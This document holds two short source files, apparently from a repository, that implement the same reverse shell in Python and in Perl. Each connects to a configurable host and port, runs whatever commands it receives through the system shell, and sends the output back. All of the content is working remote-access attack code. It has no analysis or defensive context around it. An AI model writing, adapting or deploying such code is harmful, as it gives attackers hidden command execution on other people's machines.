File: rcmd.py
import socket
import subprocess
import sys


class ReverseShell():
    def __init__(self, host='127.0.0.1', port=8000):
        self._host = host
        self._port = port
        try:
            self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        except Exception as e:
            print(str(e))
            sys.exit(-1)

    def connect2server(self):
        try:
            self.socket.connect((self._host, self._port))
        except Exception as e:
            print(str(e))
            sys.exit(-1)

    def run(self):
        self.connect2server()
        while True:
            try:
                cmd = self.socket.recv(1024).decode().strip()
                if cmd == '/exit':
                    self.socket.close()
                    return
                result = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
                self.socket.send(result)
            except Exception as e:
                print(str(e))
                sys.exit(-1)


if __name__ == '__main__':
    shell = ReverseShell()
    shell.run()

File: rcmd.pl
#!/usr/bin/perl
use strict;
use warnings;
use IO::Socket::INET;

package ReverseShell;

sub new {
    my($class, $host, $port) = @_;
    my $self = {_host => $host || '127.0.0.1', _port => $port || 8000};
    return bless $self, $class;
}

sub connect2server {
    my $self = shift;
    $self->{_socket} = IO::Socket::INET->new(
        Proto => 'tcp',
        PeerAddr => $self->{_host},
        PeerPort => $self->{_port}
    ) or die "[!!] Cannot connect to server: $!\n";
}

sub run {
    my $self = shift;
    $self->connect2server();
    while() {
        $self->{_socket}->recv(my $cmd, 1024);
        chomp($cmd);
        return if $cmd eq '/quit';
        my $result = `$cmd`;
        $self->{_socket}->send($result);
    }
}


package main;

my $shell = new ReverseShell();
$shell->run()
